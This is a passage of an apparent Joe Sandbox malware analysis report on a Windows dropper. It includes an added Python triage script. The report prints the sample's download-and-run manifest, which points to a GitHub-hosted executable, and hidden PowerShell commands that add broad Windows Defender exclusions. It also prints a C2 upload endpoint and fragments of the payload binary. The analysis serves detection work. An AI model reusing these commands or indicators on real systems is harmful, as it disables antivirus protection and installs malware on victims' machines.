                          2024-08-27 10:55:07 UTC271INData Raw: 7b 0d 0a 20 20 22 64 6f 77 6e 6c 6f 61 64 73 22 3a 20 5b 0d 0a 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 22 64 6f 77 6e 6c 6f 61 64 5f 75 72 6c 22 3a 20 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 77 6f 72 6b 68 61 73 66 2f 6b 65 6c 6d 2f 72 61 77 2f 6d 61 69 6e 2f 69 63 6f 6e 6f 7a 61 76 65 2e 65 78 65 22 2c 0d 0a 20 20 20 20 20 20 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 20 22 72 61 70 6e 65 77 73 61 2e 65 78 65 22 2c 0d 0a 20 20 20 20 20 20 22 72 75 6e 22 3a 20 74 72 75 65 0d 0a 20 20 20 20 7d 2c 0d 0a 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 22 64 6f 77 6e 6c 6f 61 64 5f 75 72 6c 22 3a 20 22 22 2c 0d 0a 20 20 20 20 20 20 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 20 22 64 6c 6c 2e 65 78 65 22 2c 0d 0a 20 20 20 20 20 20 22 72 75 6e 22 3a 20 66 61 6c 73
                          Data Ascii: { "downloads": [ { "download_url": "https://github.com/workhasf/kelm/raw/main/iconozave.exe", "file_name": "rapnewsa.exe", "run": true }, { "download_url": "", "file_name": "dll.exe", "run": fals


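The two JSON bodies fetched in sessions 0 and 1 are the sample's stage-1 configuration (staging folder plus the Defender exclusions it wants) and its download manifest. The Python below is an added example for this report, not code from the sample or from Joe Sandbox: it decodes both documents the way a triage analyst would, grading each requested exclusion by how much of the filesystem it silences and pulling out the staging path, download hosts and dropped file names as indicators. STAGE1_CONFIG is the 254-byte body from session 0 verbatim. DOWNLOAD_MANIFEST is constructed from the first, complete entry of the session 1 body, because the report truncates that body after the second entry's file_name. The category names (broad, staging, env-expanded, other) and the BROAD_TREES policy list, which adds C:\ProgramData beyond what the sample requested, are this example's own.

```python
"""Triage of the JSON documents the sample pulled from raw.githubusercontent.com.

Added example for this report; not the sample's code and not Joe Sandbox code.
"""
import json
import ntpath
from urllib.parse import urlsplit

# Session 0 body (yjsefceawd.json), 254 bytes, as shown in the report.
STAGE1_CONFIG = r'''{
  "folder_path": "C:\\Reka",
  "add_exclusions": true,
  "exclusion_paths": [
    "C:\\Users",
    "C:\\Windows",
    "C:\\Program Files",
    "C:\\Program Files (x86)",
    "C:\\Recovery",
    "C:\\Reka",
    "%USERPROFILE%\\Desktop"
  ]
}'''

# Constructed from the first (complete) entry of the session 1 body
# (nepipirusas.json); the report truncates the second entry, so it is omitted.
DOWNLOAD_MANIFEST = r'''{
  "downloads": [
    {
      "download_url": "https://github.com/workhasf/kelm/raw/main/iconozave.exe",
      "file_name": "rapnewsa.exe",
      "run": true
    }
  ]
}'''

# Example policy: a Defender path exclusion covers the folder and everything
# below it, so an exclusion on one of these trees (or on a drive root) removes
# real-time and scheduled scanning from practically every user and system binary.
BROAD_TREES = {
    "c:\\users", "c:\\windows", "c:\\program files",
    "c:\\program files (x86)", "c:\\programdata",
}


def _norm(path: str) -> str:
    """Case-fold and strip a trailing separator so C:\\Users\\ and c:\\users compare equal."""
    return ntpath.normpath(path).lower().rstrip("\\")


def classify_exclusion(path: str, staging_dir: str) -> str:
    """Grade one requested exclusion: broad, staging, env-expanded or other."""
    p = _norm(path)
    if p.startswith("%"):
        # Resolved per account at runtime (different for each user and for SYSTEM).
        return "env-expanded"
    if p in BROAD_TREES or p.endswith(":"):
        return "broad"
    if p == _norm(staging_dir):
        return "staging"
    return "other"


def triage(config_text: str, manifest_text: str) -> dict:
    """Turn the two documents into findings and indicators."""
    cfg = json.loads(config_text)
    man = json.loads(manifest_text)
    staging = cfg["folder_path"]
    exclusions = {p: classify_exclusion(p, staging) for p in cfg.get("exclusion_paths", [])}
    downloads = [d for d in man.get("downloads", []) if d.get("download_url")]
    return {
        "staging_dir": staging,
        "adds_exclusions": bool(cfg.get("add_exclusions")),
        "exclusions": exclusions,
        "broad_exclusions": sorted(p for p, v in exclusions.items() if v == "broad"),
        "download_hosts": sorted({urlsplit(d["download_url"]).hostname for d in downloads}),
        "dropped_paths": [ntpath.join(staging, d["file_name"]) for d in downloads],
        "auto_run": [d["file_name"] for d in downloads if d.get("run")],
    }


if __name__ == "__main__":
    for key, value in triage(STAGE1_CONFIG, DOWNLOAD_MANIFEST).items():
        print(f"{key}: {value}")
```

The four broad entries are the finding: with C:\Users, C:\Windows and both Program Files trees excluded, Defender's on-access scanning no longer sees the locations a user, an installer or the OS writes executables to, which is why the report flags "Adds a directory exclusion to Windows Defender" and the Base64 MpPreference Sigma rule. C:\Reka is the path to hunt for on other hosts, and %USERPROFILE%\Desktop is reported separately because it expands to a different folder for every account that runs the exclusion command.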
                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          2 | 192.168.2.4 | 49738 | 140.82.121.3 | 443 | 6120 | C:\Users\user\Desktop\1feP5qTCl0.exe
                          Timestamp | Bytes transferred | Direction | Data
                          2024-08-27 10:55:34 UTC | 127 | OUT | GET /workhasf/kelm/raw/main/iconozave.exe HTTP/1.1
                          Host: github.com
                          User-Agent: Go-http-client/1.1
                          Accept-Encoding: gzip
                          2024-08-27 10:55:35 UTC | 547 | IN | HTTP/1.1 302 Found
                          Server: GitHub.com
                          Date: Tue, 27 Aug 2024 10:55:35 GMT
                          Content-Type: text/html; charset=utf-8
                          Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                          Access-Control-Allow-Origin:
                          Location: https://raw.githubusercontent.com/workhasf/kelm/main/iconozave.exe
                          Cache-Control: no-cache
                          Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                          X-Frame-Options: deny
                          X-Content-Type-Options: nosniff
                          X-XSS-Protection: 0
                          Referrer-Policy: no-referrer-when-downgrade
                          2024-08-27 10:55:35 UTC3260INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 77 65 62 70 61 63 6b 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f
                          Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.co


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          3 | 192.168.2.4 | 49739 | 185.199.109.133 | 443 | 6120 | C:\Users\user\Desktop\1feP5qTCl0.exe
                          Timestamp | Bytes transferred | Direction | Data
                          2024-08-27 10:55:35 UTC | 204 | OUT | GET /workhasf/kelm/main/iconozave.exe HTTP/1.1
                          Host: raw.githubusercontent.com
                          User-Agent: Go-http-client/1.1
                          Referer: https://github.com/workhasf/kelm/raw/main/iconozave.exe
                          Accept-Encoding: gzip
                          2024-08-27 10:55:35 UTC | 898 | IN | HTTP/1.1 200 OK
                          Connection: close
                          Content-Length: 38912
                          Cache-Control: max-age=300
                          Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                          Content-Type: application/octet-stream
                          ETag: "12c37a0d92e3f8714d00d8ffa40d644b8e2520270caa1a870ac073d1e42f9dd0"
                          Strict-Transport-Security: max-age=31536000
                          X-Content-Type-Options: nosniff
                          X-Frame-Options: deny
                          X-XSS-Protection: 1; mode=block
                          X-GitHub-Request-Id: 6C35:16B1:419376:488FF3:66CDB0A7
                          Accept-Ranges: bytes
                          Date: Tue, 27 Aug 2024 10:55:35 GMT
                          Via: 1.1 varnish
                          X-Served-By: cache-ewr-kewr1740037-EWR
                          X-Cache: MISS
                          X-Cache-Hits: 0
                          X-Timer: S1724756136.654126,VS0,VE50
                          Vary: Authorization,Accept-Encoding,Origin
                          Access-Control-Allow-Origin: *
                          Cross-Origin-Resource-Policy: cross-origin
                          X-Fastly-Request-ID: 8a2178ee78a21770472bc4dccdc7e4614672539b
                          Expires: Tue, 27 Aug 2024 11:00:35 GMT
                          Source-Age: 0
                          2024-08-27 10:55:35 UTC1378INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 f1 8e cb ea b5 ef a5 b9 b5 ef a5 b9 b5 ef a5 b9 b3 6e a6 b8 b1 ef a5 b9 fe 97 a4 b8 b8 ef a5 b9 b5 ef a4 b9 a0 ef a5 b9 da 6e a1 b8 a9 ef a5 b9 da 6e a7 b8 b4 ef a5 b9 52 69 63 68 b5 ef a5 b9 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 50 53 cc 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 26 00 84 00 00 00 14 00 00 00 00 00 00 30 1d 00 00 00 10 00
                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$nnnRichPELPSf&0
                          2024-08-27 10:55:35 UTC1378INData Raw: 52 e8 88 7f 00 00 83 c4 08 89 45 ec 8b 45 f8 8b 48 08 ba 04 00 00 00 6b c2 00 81 bc 01 1a 04 00 00 4c 11 d2 ca 75 27 6a 00 8b 4d f8 8b 51 08 52 8b 45 08 50 8b 4d f8 83 c1 04 51 8b 55 f8 8b 02 50 e8 28 25 00 00 83 c4 14 e9 29 01 00 00 c6 45 ff 00 eb 09 8a 4d ff 80 c1 01 88 4d ff 0f b6 55 ff 81 fa 80 00 00 00 0f 83 0a 01 00 00 8b 45 f8 8b 48 08 0f b6 55 ff 83 bc 91 1a 04 00 00 00 75 02 eb d1 8b 45 f8 8b 48 08 0f b6 55 ff 0f b6 84 11 1a 07 00 00 83 f8 01 75 3c 83 7d f0 00 75 36 8b 4d 0c 83 c1 2c 51 e8 a2 7e 00 00 83 c4 04 89 45 f4 83 7d f4 00 74 1e 8b 55 f4 52 e8 2d 10 00 00 83 c4 04 d1 e0 50 8b 45 f4 50 e8 be 7e 00 00 83 c4 08 89 45 f0 83 7d f0 00 74 16 8b 4d f8 8b 51 08 0f b6 45 ff 8b 8c 82 1a 04 00 00 3b 4d f0 74 2c 8b 55 f8 8b 42 08 0f b6 4d ff 0f b6 94
                          Data Ascii: REEHkLu'jMQREPMQUP(%)EMMUEHUuEHUu<}u6M,Q~E}tUR-PEP~E}tMQE;Mt,UBM
                          2024-08-27 10:55:35 UTC1378INData Raw: 0c 00 00 83 c4 08 85 c0 74 07 b8 01 00 00 00 eb 02 33 c0 8b e5 5d c3 cc cc cc cc cc 55 8b ec 83 ec 14 e8 55 05 00 00 e8 50 03 00 00 85 c0 75 07 33 c0 e9 ce 00 00 00 68 8d bd c1 3f a1 78 b0 40 00 50 e8 d5 00 00 00 83 c4 08 a3 94 b0 40 00 83 3d 94 b0 40 00 00 75 07 33 c0 e9 a6 00 00 00 c7 45 f0 90 b0 40 00 8b 4d f0 89 4d f8 c7 45 ec 78 b0 40 00 8b 55 ec 89 55 f4 8b 45 f4 83 e8 04 89 45 f4 c6 45 ff 00 eb 09 8a 4d ff 80 c1 01 88 4d ff 0f b6 55 ff 83 fa 27 73 66 8b 45 f8 83 38 00 75 16 8b 4d f4 83 c1 04 89 4d f4 8b 55 f8 83 c2 04 89 55 f8 eb d2 eb 18 8b 45 f8 8b 08 3b 0d 94 b0 40 00 75 0b 8b 55 f8 83 c2 04 89 55 f8 eb b8 8b 45 f8 8b 08 51 8b 55 f4 8b 02 50 e8 3b 00 00 00 83 c4 08 8b 4d f8 89 01 8b 55 f8 83 3a 00 75 04 33 c0 eb 10 8b 45 f8 83 c0 04 89 45 f8 eb
                          Data Ascii: t3]UUPu3h?x@P@=@u3E@MMEx@UUEEEMMU'sfE8uMMUUE;@uUUEQUP;MU:u3EE
                          2024-08-27 10:55:35 UTC1378INData Raw: 8c b0 40 00 83 ae 0c 5f 75 06 33 c0 eb 07 eb 05 b8 01 00 00 00 8b e5 5d c3 cc 55 8b ec 33 c0 74 2b 6a 00 6a 00 6a 00 6a 00 6a 00 6a 00 ff 15 00 a0 40 00 6a 00 6a 00 6a 00 6a 00 6a 00 e8 12 77 00 00 6a 00 6a 00 ff 15 64 a0 40 00 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 8b 45 08 50 e8 54 0d 00 00 83 c4 04 e8 4c 22 00 00 e8 e7 01 00 00 e8 32 fb ff ff 5d c3 55 8b ec e8 38 fa ff ff 85 c0 74 22 e8 9f 01 00 00 85 c0 74 19 e8 96 20 00 00 85 c0 74 10 8b 45 08 50 e8 49 0b 00 00 83 c4 04 85 c0 75 08 6a 00 ff 15 14 a0 40 00 5d c3 cc cc cc cc cc cc cc cc 55 8b ec 83 ec 08 c7 45 f8 00 00 00 00 33 c0 66 89 45 fc eb 0c 66 8b 4d fc 66 83 c1 01 66 89 4d fc 0f b7 55 fc 81 fa e8 03 00 00 73 19 0f b7 45 fc 8b 4d 08 83 7c 81 10 00 74 09 c7 45 f8 01 00 00 00 eb 02 eb
                          Data Ascii: @_u3]U3t+jjjjjj@jjjjjwjjd@]UEPTL"2]U8t"t tEPIuj@]UE3fEfMffMUsEM|tE


                          Session ID: 4
                          Source IP: 192.168.2.4
                          Source Port: 49740
                          Destination IP: 45.125.66.18
                          Destination Port: 443
                          PID: 6044
                          Process: C:\Reka\rapnewsa.exe
                          Timestamp: 2024-08-27 10:55:39 UTC, Bytes transferred: 287, Direction: OUT
                          Data:
                          POST /api/receiver/recv HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: application/octet-stream
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Edg/91.0.864.48
                          Content-Length: 3160
                          Host: 45.125.66.18
                          Timestamp: 2024-08-27 10:55:39 UTC, Bytes transferred: 3160, Direction: OUT
                          Data Ascii: {a33c7340-61ca-11ee-8c18-806e6f6e6963}
                          Timestamp: 2024-08-27 10:55:39 UTC, Bytes transferred: 231, Direction: IN
                          Data:
                          HTTP/1.1 201 Created
                          Server: nginx/1.18.0
                          Date: Tue, 27 Aug 2024 10:55:39 GMT
                          Content-Type: application/octet-stream
                          Content-Length: 4230
                          Connection: close
                          X-Powered-By: Express
                          ETag: W/"1086-eeEIvwQRvsIx4B3isHTXuBfT8l0"
                          Timestamp: 2024-08-27 10:55:39 UTC, Bytes transferred: 4230, Direction: IN
                          Data Ascii:


                          Session ID: 5
                          Source IP: 192.168.2.4
                          Source Port: 49741
                          Destination IP: 34.194.69.213
                          Destination Port: 443
                          PID: 6120
                          Process: C:\Users\user\Desktop\1feP5qTCl0.exe
                          Timestamp: 2024-08-27 10:55:43 UTC, Bytes transferred: 95, Direction: OUT
                          Data:
                          GET /get HTTP/1.1
                          Host: httpbin.org
                          User-Agent: Go-http-client/1.1
                          Accept-Encoding: gzip
                          Timestamp: 2024-08-27 10:55:43 UTC, Bytes transferred: 225, Direction: IN
                          Data:
                          HTTP/1.1 200 OK
                          Date: Tue, 27 Aug 2024 10:55:43 GMT
                          Content-Type: application/json
                          Content-Length: 238
                          Connection: close
                          Server: gunicorn/19.9.0
                          Access-Control-Allow-Origin: *
                          Access-Control-Allow-Credentials: true
                          Timestamp: 2024-08-27 10:55:43 UTC, Bytes transferred: 238, Direction: IN
                          Data Ascii: { "args": {}, "headers": { "Host": "httpbin.org", "User-Agent": "Go-http-client/1.1", "X-Amzn-Trace-Id": "Root=1-66cdb0af-5e3ab6917622bdb40da2783b" }, "origin": "8.46.123.33", "url": "https://httpbin.org/get"}

                          Target ID:0
                          Start time:06:55:04
                          Start date:27/08/2024
                          Path:C:\Users\user\Desktop\1feP5qTCl0.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Users\user\Desktop\1feP5qTCl0.exe"
                          Imagebase:0x2e0000
                          File size:8'077'824 bytes
                          MD5 hash:A499C507987982C951093E21DF0C0D96
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:Go lang
                          Reputation:low
                          Has exited:true

                          Target ID:1
                          Start time:06:55:10
                          Start date:27/08/2024
                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit):false
                          Commandline:powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
                          Imagebase:0x7ff788560000
                          File size:452'608 bytes
                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:2
                          Start time:06:55:10
                          Start date:27/08/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:4
                          Start time:06:55:13
                          Start date:27/08/2024
                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit):false
                          Commandline:powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Windows'"
                          Imagebase:0x7ff788560000
                          File size:452'608 bytes
                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:5
                          Start time:06:55:13
                          Start date:27/08/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:6
                          Start time:06:55:15
                          Start date:27/08/2024
                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit):false
                          Commandline:powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Program Files'"
                          Imagebase:0x7ff788560000
                          File size:452'608 bytes
                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:7
                          Start time:06:55:15
                          Start date:27/08/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:8
                          Start time:06:55:18
                          Start date:27/08/2024
                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit):false
                          Commandline:powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Program Files (x86)'"
                          Imagebase:0x7ff788560000
                          File size:452'608 bytes
                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:9
                          Start time:06:55:18
                          Start date:27/08/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:10
                          Start time:06:55:20
                          Start date:27/08/2024
                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit):false
                          Commandline:powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Recovery'"
                          Imagebase:0x7ff788560000
                          File size:452'608 bytes
                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:11
                          Start time:06:55:20
                          Start date:27/08/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:13
                          Start time:06:55:23
                          Start date:27/08/2024
                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit):false
                          Commandline:powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Reka'"
                          Imagebase:0x7ff788560000
                          File size:452'608 bytes
                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:14
                          Start time:06:55:23
                          Start date:27/08/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:15
                          Start time:06:55:25
                          Start date:27/08/2024
                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit):false
                          Commandline:powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath '%USERPROFILE%\Desktop'"
                          Imagebase:0x7ff788560000
                          File size:452'608 bytes
                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:16
                          Start time:06:55:25
                          Start date:27/08/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:19
                          Start time:06:55:34
                          Start date:27/08/2024
                          Path:C:\Reka\rapnewsa.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Reka\rapnewsa.exe
                          Imagebase:0xa40000
                          File size:38'912 bytes
                          MD5 hash:2D4E723C184D9403B078E53F2DE74A23
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Antivirus matches:
                          • Detection: 100%, Avira
                          • Detection: 100%, Joe Sandbox ML
                          • Detection: 16%, ReversingLabs
                          • Detection: 24%, Virustotal
                          Has exited:true

                          Target ID:22
                          Start time:06:55:39
                          Start date:27/08/2024
                          Path:C:\Windows\SysWOW64\WerFault.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6044 -s 56480
                          Imagebase:0xa40000
                          File size:483'680 bytes
                          MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                            Memory Dump Source
                            • Source File: 00000000.00000002.2047361224.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_2e0000_1feP5qTCl0.jbxd

                            Execution Graph

                            Execution Coverage:19.4%
                            Dynamic/Decrypted Code Coverage:0%
                            Signature Coverage:14.5%
                            Total number of Nodes:379
                            Total number of Limit Nodes:11
2809->2811 2811->2808 2811->2809 2813 a41ea0 RtlAllocateHeap 2811->2813 2812->2684 2813->2811 2815 a43a3c 2814->2815 2816 a48b90 GetCurrentHwProfileA 2815->2816 2817 a43a50 2816->2817 2826 a43b80 2817->2826 2821 a43b60 2822 a41ee0 RtlFreeHeap 2821->2822 2823 a43b6c 2822->2823 2823->2657 2824 a43ada 2824->2821 2825 a42b10 3 API calls 2824->2825 2825->2821 2841 a41ec0 RtlSizeHeap 2826->2841 2828 a43b8f 2842 a41ea0 RtlAllocateHeap 2828->2842 2830 a43ba7 2831 a47d10 RtlAllocateHeap 2830->2831 2836 a43bb4 2831->2836 2832 a43be2 2833 a43c1c 2832->2833 2834 a43bf0 2832->2834 2835 a41ee0 RtlFreeHeap 2833->2835 2838 a41ee0 RtlFreeHeap 2834->2838 2839 a43ac8 2835->2839 2836->2832 2837 a480d0 RtlFreeHeap 2836->2837 2837->2832 2838->2839 2840 a41ea0 RtlAllocateHeap 2839->2840 2840->2824 2841->2828 2842->2830 2854 a41ea0 RtlAllocateHeap 2843->2854 2845 a433a7 2846 a433c2 2845->2846 2847 a433b3 LocalFree 2845->2847 2849 a433dd 2846->2849 2850 a433cd LocalAlloc 2846->2850 2847->2849 2848 a432b3 2848->2845 2851 a48b90 GetCurrentHwProfileA 2848->2851 2849->2661 2850->2849 2852 a432ea 2851->2852 2853 a42b10 3 API calls 2852->2853 2853->2845 2854->2848 2895 a41ea0 RtlAllocateHeap 2855->2895 2857 a4148e 2858 a4149b NtQuerySystemInformation 2857->2858 2859 a42060 2 API calls 2857->2859 2858->2857 2864 a414d3 2858->2864 2859->2857 2860 a415fa 2863 a41ee0 RtlFreeHeap 2860->2863 2861 a415f5 2861->2520 2862 a41512 OpenProcess 2862->2864 2865 a41603 2863->2865 2864->2860 2864->2861 2864->2862 2866 a4153a GetCurrentProcess DuplicateHandle 2864->2866 2865->2520 2867 a4156f 2866->2867 2868 a415eb FindCloseChangeNotification 2866->2868 2867->2868 2869 a4157b GetFileType 2867->2869 2868->2861 2869->2868 2870 a4158a 2869->2870 2896 a41610 2870->2896 2872 a41593 2872->2868 2873 a4159a CloseHandle GetCurrentProcess DuplicateHandle 2872->2873 2873->2868 2874 a415d2 2873->2874 2874->2868 2875 a415d8 CloseHandle 2874->2875 2875->2868 2876->2523 2878 a431c5 2877->2878 2900 a48d00 
GetUserDefaultUILanguage 2878->2900 2880 a43233 2901 a48c00 EnumDisplayDevicesA 2880->2901 2882 a4324b 2883 a48b90 GetCurrentHwProfileA 2882->2883 2884 a43259 2883->2884 2903 a48cc0 GetPhysicallyInstalledSystemMemory 2884->2903 2886 a43265 2905 a48ca0 GetSystemInfo 2886->2905 2888 a43271 2906 a48c50 GetKeyboardLayoutList 2888->2906 2890 a4327d 2907 a48c70 KiUserCallbackDispatcher GetSystemMetrics 2890->2907 2892 a43289 2908 a48d20 GetModuleFileNameW 2892->2908 2894 a43295 2894->2527 2895->2857 2897 a4161d 2896->2897 2898 a41656 NtQueryObject NtQueryObject 2897->2898 2899 a41693 2898->2899 2899->2872 2900->2880 2902 a48c2a 2901->2902 2902->2882 2904 a48cd4 __aulldiv 2903->2904 2904->2886 2905->2888 2906->2890 2907->2892 2908->2894 2909->2532 2911 a429ec 2910->2911 2912 a42a25 2911->2912 2913 a42a17 TerminateThread 2911->2913 2914 a42a3d 2912->2914 2915 a42a2e TerminateThread 2912->2915 2913->2912 2914->2538 2915->2914 2917 a443e0 3 API calls 2916->2917 2918 a41c94 2917->2918 2919 a41e80 HeapDestroy 2918->2919 2919->2542 2932 a425e3 2933 a425eb 2932->2933 2934 a42629 2933->2934 2935 a426ba 2933->2935 2940 a4260d 2933->2940 2954 a41ea0 RtlAllocateHeap 2934->2954 2936 a426cc 2935->2936 2937 a4275d 2935->2937 2955 a41ea0 RtlAllocateHeap 2936->2955 2937->2940 2956 a41ea0 RtlAllocateHeap 2937->2956 2942 a42648 2945 a41060 12 API calls 2942->2945 2943 a426eb 2946 a412f0 